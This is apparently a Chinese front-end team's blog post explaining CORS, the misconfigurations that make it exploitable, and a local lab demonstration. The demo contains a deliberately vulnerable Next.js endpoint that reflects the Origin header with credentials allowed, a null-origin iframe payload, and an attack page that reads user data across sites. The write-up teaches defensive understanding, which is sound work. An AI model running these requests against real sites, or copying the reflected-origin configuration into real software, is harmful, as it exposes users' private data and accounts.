发布: 更新时间:2024-09-13 10:00:04
我们是
袋鼠云数栈 UED 团队
,致力于打造优秀的一站式数据中台产品。我们始终保持工匠精神,探索前端道路,为社区积累并传播经验价值。
本文作者:霁明
CORS(跨域资源共享)是一种基于HTTP头的机制,可以放宽浏览器的同源策略,实现不同域名网站之间的通信。
同源定义:协议、域名、端口号一致即为同源。
CORS主要相关标头:
Access-Control-Allow-Origin:指定该响应的资源是否允许与给定的来源(origin)共享。
Access-Control-Allow-Credentials:用于在请求要求包含 credentials 时,告知浏览器是否可以将对请求的响应暴露给前端 JavaScript 代码。
将ACAO标头指定为特定的源,Access-Control-Allow-Origin:
http://a.b.com
如果请求需要携带凭证(例如cookies、authorization headers 或 TLS client certificates),需要将ACAC标头设置为true,Access-Control-Allow-Credentials: true。
另外,前端请求方法需要配置 credentials
// XHR
const xhr = new XMLHttpRequest();
xhr.open("GET", "http://example.com/");
xhr.withCredentials = true;
xhr.send();
// Fetch
fetch(url, {
credentials: "include",
});
将多个源同时写在ACAO标头里:
Access-Control-Allow-Origin: http://a.b.com,http://c.b.com
或者同时设置了多个ACAO标头:
Access-Control-Allow-Origin: http://a.b.com
Access-Control-Allow-Origin: http://c.b.com
此时跨域请求会报错,提示只能配置一个源:
Access-Control-Allow-Origin: *.b.com
此时跨域请求会报错,提示配置的源无效:
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
跨域请求时会报错,提示当携带凭证时ACAO标头不能为“*”:
在 Nginx 配置中,一般会在http、server 或 location 模块中设置响应标头,代码示例:
add_header Access-Control-Allow-Origin http://target.dtstack.cn;
add_header Access-Control-Allow-Credentials true;
// 其他 Access-Control 标头
可以在后端代码中设置,部分后端框架也会设置默认值,以下是部分软件框架默认值设置情况:
在跨域资源共享过程中,由于 CORS 配置不当,导致本应该受限的访问请求,可以绕过访问控制策略读取资源服务器的数据,造成用户隐私泄露,信息窃取甚至账户劫持的危害。
CORS 的几种配置情况:
序号 | Access-Control-Allow-Origin | Access-Control-Allow-Credentials | 结果 |
---|---|---|---|
1 | * | true | 存在漏洞 |
2 | 任意的源 | true | 存在漏洞 |
3 | 指定具体的源> | true | 不存在漏洞 |
4 | null | true | 存在漏洞 |
5 | * | 不设置 | 存在漏洞 |
6 | 任意的源 | 不设置 | 存在漏洞 |
7 | 指定具体的源 | 不设置 | 不存在漏洞 |
8 | null | 不设置 | 存在漏洞 |
对于情况1,Access-Control-Allow-Origin: *,Access-Control-Allow-Credentials: true:
对于其他存在漏洞情况,都可以通过某些手段,获取到请求返回的数据,这里就不细说。
可以攻击的前提:目标网站存在CORS漏洞
任何使用非分级协议(如 data: 或 file:)的资源和沙盒文件的 Origin 的序列化都被定义为 “null”,这里利用 iframe 标签,使用 data url 格式将 src 的值直接加载为 html,请求代码就写在<script>标签中:
<iframe
sandbox="allow-scripts allow-top-navigation allow-forms"
src='data:text/html,<script>fetch("http://target.dtstack.cn:4000/api/getUserInfo", { method: "POST", credentials: "include" })</script>'
></iframe>
在 attack.dtstack.cn 页面加载这段代码后就会发出请求:
Host: target.dtstack.cn:4000
Origin: null
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: null
由于 Origin 和 ACAO 标头匹配,所以接口能正常响应获取到数据。
例如目标域名是 target.top,当 origin 匹配规则为包含 target.top 字符串时,攻击网站可以通过以下几种方式去绕过 origin 校验,使得请求响应的 ACAO 标头为攻击站点,从而成功进行跨域请求。
当目标网站是直接使用请求头的 Origin 作为响应的 ACAO 标头时,相当于允许任意站点进行跨域请求。
有时目标网站会信任某些第三方网站,例如一些云服务网站,这时如果攻击者使用同一云服务商的产品(源相同),也可以对目标站点发起跨域请求。
在本地使用 Next.js 搭建两个站点,一个是 target.dtstack.cn:4000,一个是 attack.dtstack.cn:3000。
target 站点有一个查询用户信息接口,并且 CORS 配置存在漏洞,target 站点首页可以通过接口获取用户信息。
页面代码图如下:
'use client';
import { useState } from 'react';
const url = '/api/getUserInfo';
export default function Home() {
const [data, setData] = useState('');
const getData = () => {
setData('请求数据...');
fetch(url, { method: 'POST' })
.then((res) => res.json())
.then((data: Record<string, any>) => {
setData(JSON.stringify(data, null, 2));
})
.catch(() => {
setData('请求数据失败');
});
};
return (
<div>
<h3>This is target site</h3>
<button onClick={getData} style={{ margin: "0 0 12px" }}>
获取数据
</button>
<div>
<textarea
readOnly
value={data}
style={{ width: 500, height: 500 }}
/>
</div>
</div>
);
}
查询用户信息接口直接将请求的 Origin 设置为 ACAO 标头,且 ACAC 标头设置为 true,代码如下:
export default async function handler(
req: NextApiRequest,
res: NextApiResponse
) {
const cors = Cors({
origin: req.headers.origin,
credentials: true,
methods: ['POST', 'GET', 'HEAD'],
});
await runMiddleware(req, res, cors);
res.setHeader('Set-Cookie', 'user_name=admin; Domain=.target.dtstack.cn; Expires=Fri, 26 Apr 2024 07:13:04 GMT; Path=/;');
res.json({ username: 'admin' });
}
attack 站点可以在页面上,发起对 target 站点查询用户信息接口的请求
页面实现代码如下:
'use client';
import { useState } from 'react';
const targetUrl = 'http://target.dtstack.cn:4000/api/getUserInfo';
export default function Home() {
const [data, setData] = useState('');
const getData = (url: string) => {
setData('请求数据...');
fetch(url, {
method: 'POST',
credentials: 'include',
})
.then((res) => res.json())
.then((data: Record<string, any>) => {
setData(JSON.stringify(data, null, 2));
})
.catch(() => {
setData('请求数据失败');
});
};
return (
<div>
<h3>This is attack site</h3>
<button
onClick={() => getData(targetUrl)}
style={{ margin: '0 12px 12px 0' }}
>
获取target数据
</button>
<div>
<textarea
readOnly
value={data}
style={{ width: 500, height: 500 }}
/>
</div>
<iframe
sandbox="allow-scripts allow-top-navigation allow-forms"
src='data:text/html,<script>fetch("http://target.dtstack.cn:4000/api/getUserInfo", { method: "POST", credentials: "include" })</script>'
></iframe>
</div>
);
}
打开 attack 页面,请求 target 站点的
http://target.dtstack.cn:4000/api/getUserInfo
接口
请求头:
Host: target.dtstack.cn:4000
Origin: http://attack.dtstack.cn:3000
响应头:
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://attack.dtstack.cn:3000
此时成功获取到了target站点的用户数据:
如果想要在非同站情况下发送cookie,SameSite属性需要为None,且必须同时设置Secure属性,而Secure属性在使用Https协议时才可以使用。使用目前最新版的Chrome (v124)、Edge (v124)、Firefox (v125)进行测试,Firefox和Chrome不会发送目标站点cookie,而Edge会发送。
欢迎关注【袋鼠云数栈UED团队】~
袋鼠云数栈 UED 团队持续为广大开发者分享技术成果,相继参与开源了欢迎 star